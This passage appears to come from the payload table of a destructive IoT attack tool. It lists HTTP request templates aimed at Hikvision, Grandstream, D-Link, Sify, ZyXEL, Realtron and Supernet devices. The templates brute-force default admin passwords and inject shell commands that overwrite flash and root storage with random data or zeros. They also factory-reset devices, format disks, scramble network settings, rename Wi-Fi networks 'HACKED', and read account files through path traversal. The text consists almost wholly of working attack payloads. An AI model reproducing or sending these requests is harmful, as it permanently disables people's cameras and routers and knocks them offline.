HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n\r\nHACKED' , 'PUT /ISAPI/System/Video/inputs/channels/4 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n\r\nHACKED' , 'PUT /ISAPI/ContentMgmt/Storage/hdd/SATA1/format HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n' , 'PUT /ISAPI/ContentMgmt/Storage/hdd/1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n1SATASATAok953869944128RO' , 'PUT /ISAPI/System/Network/interfaces/1?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n\n1dualstatic10.%%RAND8%%255.255.255.010.%%COMP8%%1.2.3.41.2.3.58c:e7:48:35:ad:e4true0full1500' , 'PUT /ISAPI/System/Network/interfaces/1?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n\r\nfalsescansucc10.%%RAND8%%10.%%COMP8%%' , 'PUT /ISAPI/System/factoryReset/mode=full HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n' , 'PUT /ISAPI/System/reboot HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'grandstream' , 'Server: GS-Webs' , 'GET /Pages/system.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\n' , 'GET /Pages/system.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNDU=\r\n\r\n' , 'GET /Pages/system.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n\r\n' , 'GET /Pages/system.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNDU2\r\n\r\n' , 'GET /Pages/system.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46ODg4ODg4\r\n\r\n' , 'GET /goform/network?cmd=set&enabledhcp=0&ipaddress=10.%%RAND8%%&subnetmask=255.255.255.0&defaultgateway=10.%%COMP8%%&autodns=0&dnsserver.primary=1.2.3.4&dnsserver.standby=1.2.3.5&httpport=80 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\n\r\n' , 'GET /goform/date_time?cmd=set&updatemode=1&ntpserverenable=1&ntpserver=%2560cat%2520%252Fdev%252Furandom%2520%253E%252Fdev%252Froot%2560&ntpupdateinterval=60&timezone=25&deftimezone=&enable_dst=0&dst_str=GMT-03%253A30MDT-04%253A30%252CM1.1.0%252F00%253A00%253A00%252CM2.1.0%252F00%253A00%253A00 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\n\r\n' , 'POST /goform/maintenance?cmd=set&restart=yes HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'dir300600' , '(DIR-600 Ver 2\.1[1234]|DIR-300 Ver 2\.1[23])' , 'POST /command.php HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: %%BODYLENGTH%%\r\n\r\ncmd=route del default;iproute del default;ip route del default;cat /dev/urandom >/dev/mtdblock/0;cat /dev/urandom >/dev/mtdblock/1;cat /dev/urandom >/dev/mtdblock/2;cat /dev/urandom >/dev/mtdblock/3;cat /dev/urandom >/dev/mtdblock/4;cat /dev/urandom >/dev/mtdblock/5;cat /dev/urandom >/dev/mtdblock/6;cat /dev/urandom >/dev/mtdblock/7;cat /dev/urandom >/dev/root;cat /dev/urandom >/dev/mem;' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'dir850' , 'Server: Linux, HTTP.*DIR-850L Ver' , 'POST /hedwig.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-type: text/xml\r\nCookie: uid=aDxpxsreSa\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml' , 'GET /authentication.cgi HTTP/1.0\r\n\r\n' , ] , [ 'hikweb' , 'Server: (DNVRS-Webs|DVS-Webs|App-webs|DVRDVS-Webs|Hikvision-Webs)' , 'GET /PSIA/Custom/SelfExt/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNDU=\r\nCookie: language=en; updateTips=true\r\n\r\n' , 'GET /PSIA/Custom/SelfExt/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nCookie: language=en; updateTips=true\r\n\r\n' , 'GET /PSIA/Custom/SelfExt/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\nCookie: language=en; updateTips=true\r\n\r\n' , 'GET /PSIA/Custom/SelfExt/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46ODg4ODg4\r\nCookie: language=en; updateTips=true\r\n\r\n' , 'GET /PSIA/Custom/SelfExt/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46NTQzMjE=\r\nCookie: language=en; updateTips=true\r\n\r\n' , 'GET /PSIA/Custom/SelfExt/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNDU2\r\nCookie: language=en; updateTips=true\r\n\r\n' , 'GET /PSIA/Custom/SelfExt/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTExMTEx\r\nCookie: language=en; updateTips=true\r\n\r\n' , 'GET /PSIA/Custom/SelfExt/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46NjU0MzIx\r\nCookie: language=en; updateTips=true\r\n\r\n' , 'GET /PSIA/Custom/SelfExt/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNDU2Nzg5YWJj\r\nCookie: language=en; updateTips=true\r\n\r\n' , 'PUT /System/factoryDefault?auth=YWRtaW46MTEK&mode=full HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' , 'PUT /System/reboot?auth=YWRtaW46MTEK HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' , 'PUT /ISAPI/System/Network/telnetd?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n\nfalse' , 'PUT /ISAPI/System/Network/interfaces/1?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n\n1dualstatic10.%%RAND8%%255.255.255.010.%%COMP8%%1.2.3.41.2.3.58c:e7:48:35:ad:e4true0full1500' , 'PUT /PSIA/System/Network/interfaces/1?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n\n1dualstatic10.%%RAND8%%255.255.255.010.%%COMP8%%1.2.3.41.2.3.58c:e7:48:35:ad:e4true0full1500' , 'PUT /PSIA/System/Network/interfaces/1?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n\n1dualstatic10.%%RAND8%%255.255.255.010.%%COMP8%%ra1.2.3.41.2.3.58c:e7:48:35:ad:e4true0full1500' , 'PUT /ISAPI/System/Network/PPPoE/1?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n\n1false1' , 'PUT /ISAPI/System/factoryReset?mode=full?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n' , 'PUT /PSIA/System/factoryReset?mode=full?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n' , 'PUT /PSIA/System/reboot?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'sify' , '200 OK.*Accept-Ranges: bytes.*Expires.*content=-1.*0; URL=/cgi-bin/luci' , 'POST /cgi-bin/luci/;stok=15443bacdb9a6ddd5df893eef7cbb995 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\npage=login&username=admin&password=admin' , 'GET /cgi-bin/luci/;strok=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: sysauth=%%CUSTOM2%%\r\n\r\n' , 'POST /cgi-bin/luci/;stok=%%CUSTOM1%%/html/CM_Location HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: sysauth=%%CUSTOM2%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\ncname=%60dd+if%3D%2Fdev%2Fzero+of%3D%2Fdev%2Froot%60&lname=%60dd+if%3D%2Fdev%2Fzero+of%3D%2Fdev%2Froot%60&email=N%2FA&phone=1&linkid=4028151015&linkid2=N%2FA&linkid3=N%2FA&linkid4=N%2FA' , 'POST /cgi-bin/luci/;stok=%%CUSTOM1%%/html/SIFYOS_WLAN HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: sysauth=%%CUSTOM2%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWLANMode=11na&WLANChannel=36&WLANaSSID=sify-is-HACKED&WLANPreferBSSID=50%3AFE%3AF2%3A00%3AC5%3A3C&secMode=none&passphrase=&ChanBwMode=0&reqfile=ST_WLAN&actionCheckBoxMgr=PreferBSSIDEnable&actionCfgSave=&actionWLANDriverApplyCfg=' , 'POST /cgi-bin/luci/;stok=%%CUSTOM1%%/html/WANSettings_StaticIP HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: sysauth=%%CUSTOM2%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWANConnectionType=2&WANGeneralAccount=&WANGeneralDomain=&WANMTUMode=0&WANGeneralIP=10.%%RAND8%%&wgip1=10&wgip2=%%RAND81%%&wgip3=%%RAND82%%&wgip4=%%RAND83%%&WANGeneralSubnetMask=255.255.255.0&wgsm1=255&wgsm2=255&wgsm3=255&wgsm4=0&WANGeneralGateway=10.%%COMP8%%&wggw1=10&wggw2=%%COMP81%%&wggw3=%%COMP82%%&wggw4=%%COMP83%%&WANDNSSourc=1&WANPrimaryDNSIP=0.0.0.0&wpdns1=0&wpdns2=0&wpdns3=0&wpdns4=0&WANSecondaryDNSIP=0.0.0.0&wsdns1=0&wsdns2=0&wsdns3=0&wsdns4=0&WANGeneralMACSel=0&WANGeneralMAClone=00%3A00%3A00%3A00%3A55%3A00&mac=%40%23statusRemotePCMAC%23%24&actionCfgSave=&wnat=chknat&igateway=icommit&reqfile=WANSettings_StaticIP&actionWANApplyCfg=' , 'POST /cgi-bin/luci/;stok=%%CUSTOM1%%/html/LANSettings HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: sysauth=%%CUSTOM2%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nLANIP=10.%%COMP8%%&lip1=10&lip2=%%COMP81%%&lip3=%%COMP82%%&lip4=%%COMP83%%&LANSubnetmask=255.255.255.254&lsm1=255&lsm2=255&lsm3=255&lsm4=254&LANDHCPSrvStartAddr=192.168.1.100&LANDHCPSrvStopAddr=192.168.1.200&LANWINSAddr=0.0.0.0&reqfile=LANSettings&actionCheckBoxMgr=LANDHCPSrvEnable&actionCheckBoxMgr=DSTEnable&actionCheckBoxMgr=RAEnable&actionCfgSave=&actionLANApplyCfg=' , 'GET /cgi-bin/luci/;stok=%%CUSTOM1%%/html/uci/saveapply?formname=CM_ConfigChanges HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: sysauth=%%CUSTOM2%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nLANIP=10.%%COMP8%%&lip1=10&lip2=%%COMP81%%&lip3=%%COMP82%%&lip4=%%COMP83%%&LANSubnetmask=255.255.255.254&lsm1=255&lsm2=255&lsm3=255&lsm4=254&LANDHCPSrvStartAddr=192.168.1.100&LANDHCPSrvStopAddr=192.168.1.200&LANWINSAddr=0.0.0.0&reqfile=LANSettings&actionCheckBoxMgr=LANDHCPSrvEnable&actionCheckBoxMgr=DSTEnable&actionCheckBoxMgr=RAEnable&actionCfgSave=&actionLANApplyCfg=' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'zyxelp660' , 'RomPager.*Welcome to the Web-Based Configurator.*GoLive Cyber' , 'POST /Forms/rpAuth_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nLoginPassword=ZyXEL+ZyWALL+Series&hiddenPassword=81dc9bdb52d04dc20036dbd8313ed055&Prestige_Login=Login' , 'POST /Forms/rpAuth_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nLoginPassword=ZyXEL+ZyWALL+Series&hiddenPassword=21232f297a57a5a743894a0e4a801fc3&Prestige_Login=Login' , 'POST /Forms/LAN_IP_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nLANIPAddr=10.%%RAND8%%&LANSubnetMask=255.255.255.254&sysSubmit=Apply' , 'POST /Forms/LAN_DHCPSetup_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nDHCP_Mode=00000001&sysPoolStartingAddr=192.168.%%RAND16%%&sysPoolCount=32&DHCPPriDNSAddr=1.2.3.4&DHCPSecDNSAddr=1.2.3.5&sysSubmit=Apply' , 'POST /Forms/WAN_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nwan_RemoteName=HACKED&wan_Mode=00000001&wanModeFlag=0&wan_Encapsulation=PPPoA&wanEncapFlag=0&wan_UserName=hacked&wan_Password=hacked&wan_ServiceName=&wan_Multiplex=LLC&wan_VPI=8&wan_VCI=35&wan_DynIP=DynamicIP&wan_ConnectSel=Conn_on_Demand&wan_IdleTime=0&WANApply=Apply' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'realtron' , '401.*Server:Realtron WebServer.*Basic realm=index.htm' , 'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\n' , 'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\n' , 'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n\r\n' , 'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\n' , 'POST /form2WlanSetup.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nwlanDisabled=ON&save=Apply+Changes&basicrates=0&operrates=0&submit.htm%3Fwlbasic.htm=Send' , 'POST /form2WlanSetup.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nwlanDisabled=ON&save=Apply+Changes&basicrates=0&operrates=0&submit.htm%3Fwlbasic.htm=Send' , 'POST /form2Dhcpd.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nlan_ip=192.168.1.1&lan_mask=255.255.255.0&dhcpmode=0&lan1=lan1&lan2=lan2&lan3=lan3&lan4=lan4&wlan=wlan&vap0=vap0&vap1=vap1&vap2=vap2&vap3=vap3&dhcpRangeStart=192.168.1.2&dhcpRangeEnd=192.168.1.254&dhcpSubnetMask=255.255.255.0&dfgw=192.168.1.1<ime=1440&dname=domain.name&dns1=192.168.1.1&dns2=&dns3=&relayaddr=192.168.2.242&submit.htm%3Fdhcpd.htm=Send&save=Apply+Changes' , 'POST /form2Dhcpd.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nlan_ip=192.168.1.1&lan_mask=255.255.255.0&dhcpmode=0&lan1=lan1&lan2=lan2&lan3=lan3&lan4=lan4&wlan=wlan&vap0=vap0&vap1=vap1&vap2=vap2&vap3=vap3&dhcpRangeStart=192.168.1.2&dhcpRangeEnd=192.168.1.254&dhcpSubnetMask=255.255.255.0&dfgw=192.168.1.1<ime=1440&dname=domain.name&dns1=192.168.1.1&dns2=&dns3=&relayaddr=192.168.2.242&submit.htm%3Fdhcpd.htm=Send&save=Apply+Changes' , 'POST /form2lansetup.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nip=10.%%RAND8%%&mask=255.255.255.0&ip2=0.0.0.0&mask2=0.0.0.0&snoop=1&submit.htm%3Ftcpiplan.htm=Send' , 'POST /form2lansetup.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nip=10.%%RAND8%%&mask=255.255.255.0&ip2=0.0.0.0&mask2=0.0.0.0&snoop=1&submit.htm%3Ftcpiplan.htm=Send' , 'POST /form2AttenSave.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsubmit.htm%3Fattention.htm=Send' , 'POST /form2AttenSave.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsubmit.htm%3Fattention.htm=Send' , 'POST /form2WanAdsl.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\naction=0&idx=0&connid=15&submit.htm%3Fwanadsl_auto_droute.htm=Send' , 'POST /form2WanAdsl.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\naction=0&idx=0&connid=15&submit.htm%3Fwanadsl_auto_droute.htm=Send' , 'POST /form2WebRefresh.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\npppoenum=2&connect=disconnect&submit.html%3Fstatus_wan.htm=Send' , 'POST /form2WebRefresh.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\npppoenum=2&connect=disconnect&submit.html%3Fstatus_wan.htm=Send' , 'POST /form2WanPhy.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nphyType=1&submit.htm%3Fwanadsl_auto_droute.htm=Send' , 'POST /form2WanPhy.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nphyType=1&submit.htm%3Fwanadsl_auto_droute.htm=Send' , 'GET / HTTP/1.0\r\n\r\n' , ] , [ 'supernet' , '401 Unauthorized.*realm=ADSL Modem.*Server: WebServer/1.0' , 'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\n' , 'POST /Forms/home_lan_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nuiViewIPAddr=10.%%RAND8%%&dhcpFlag=0&ipAddrMain=10.%%RAND8%%&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP1&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&mld_snoop_act=0&dhcpTypeRadio=0&lan_IPv6RadvdEnable=0&lan_IPv6RadvdMode=0&lan_IPv6AutoPrefix=0&lan_Ipv6Address0=2005%3A%3A&lan_Ipv6Address1=64&lan_Ipv6PreLifetime=604800&lan_IPv6ValidLifetime=2592000&lan_ManagedAddr=on&lan_OtherConfig=on&lan_IPv6DHCP6Server=0&lan_IPv6DHCP6Mode=0&lan_Ipv6DHCP6Address0=%3A%3A&lan_Ipv6DHCP6Address1=0&lan_Ipv6DHCP6PreLifetime=0&lan_IPv6DHCP6ValidLifetime=0&lan_IPv6DHCP6DNSServer1=%3A%3A&lan_IPv6DHCP6DNSServer2=%3A%3A' , 'POST /Forms/home_wlan_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nwlanWEBFlag=0&AccessFlag=1&wlan_APenable=0&Channel_ID=00000000&BeaconInterval=100&RTSThreshold=2347&FragmentThreshold=2346&DTIM=1&WirelessMode=802.11b%2Bg%2Bn&WLANChannelBandwidth=40+MHz&WLANGuardInterval=AUTO&WLANMCS=AUTO&WLSSIDIndex=1&ESSID_HIDE_Selection=0&ESSID=HACKED&WEP_Selection=WPA-PSK%2FWPA2-PSK&TKIP_Selection=TKIP%2FAES&PreSharedKey=4171258257&WLAN_FltActive=0&WLAN_FltAction=00000000&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLanLockFlag=0&wlanRadiusWEPFlag=0' , 'POST /Forms/home_wlan_1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nwlanWEBFlag=0&AccessFlag=1&wlan_APenable=0&Channel_ID=00000000&BeaconInterval=100&RTSThreshold=2347&FragmentThreshold=2346&DTIM=1&WirelessMode=802.11b%2Bg%2Bn&WLANChannelBandwidth=40+MHz&WLANGuardInterval=AUTO&WLANMCS=AUTO&WLSSIDIndex=1&ESSID_HIDE_Selection=0&ESSID=HACKED&WEP_Selection=WPA-PSK%2FWPA2-PSK&TKIP_Selection=TKIP%2FAES&PreSharedKey=4171258257&WLAN_FltActive=0&WLAN_FltAction=00000000&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLANFLT_MAC=00%3A00%3A00%3A00%3A00%3A00&WLanLockFlag=0&wlanRadiusWEPFlag=0' , 'POST 